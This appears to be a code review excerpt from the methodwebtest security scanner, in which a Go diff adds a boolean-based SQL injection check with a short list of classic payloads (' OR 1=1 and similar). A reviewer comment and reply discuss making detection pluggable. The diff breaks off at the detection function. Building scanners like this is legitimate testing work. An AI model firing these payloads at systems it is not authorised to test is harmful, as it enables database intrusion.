internal/general/multi/sqli/boolean.go

```diff
@@ -0,0 +1,55 @@
+package general
+
+import (
+	"context"
+
+	methodwebtest "github.com/Method-Security/methodwebtest/generated/go"
+	utils "github.com/Method-Security/methodwebtest/utils/engines"
+)
+
+// SQL error-based payloads
+var sqliBooleanPayloads = []string{
+	`'--`,
+	`' OR 'a'='a`,
+	`' OR 1=1`,
+	`' OR TRUE`,
+}
+
+func PerformSqliBooleanInjection(ctx context.Context, config *methodwebtest.MultiInjectionConfig) *methodwebtest.Report {
+	generatedInjectionPayloads := utils.GenerateInjectionPayloads(sqliBooleanPayloads, config.VariableData)
+	generatedBaselinePayloads := utils.GenerateBaselinePayloads(config.VariableData)
+
+	injectionConfig := methodwebtest.InjectionEngineConfig{
+		Targets:           config.Targets,
+		Method:            config.Method,
+		Paths:             []string{"/"},
+		BaselinePayload:   generatedBaselinePayloads,
+		InjectedPayloads:  generatedInjectionPayloads,
+		InjectionLocation: config.InjectionLocation,
+		EventType:         methodwebtest.NewEventTypeFromMultiEvent(methodwebtest.MultiEventSqliboolean),
+		Timeout:           config.Timeout,
+		Retries:           config.Retries,
+		Sleep:             config.Sleep,
+	}
+
+	report := utils.RunMultiInjectionsEngine(ctx, &injectionConfig)
+	checkForSqliBooleanBased(report)
+	return report
+}
+
+func checkForSqliBooleanBased(report *methodwebtest.Report) {
```

Comment:
One thought for future improvements. This should also be an interface that allows us to iteratively add more complex logic for determining if an injection worked. Like you can imagine running through a list of implementations that would determine if an injection worked, perhaps even leveraging an edge LLM.

Reply:
I like this idea a lot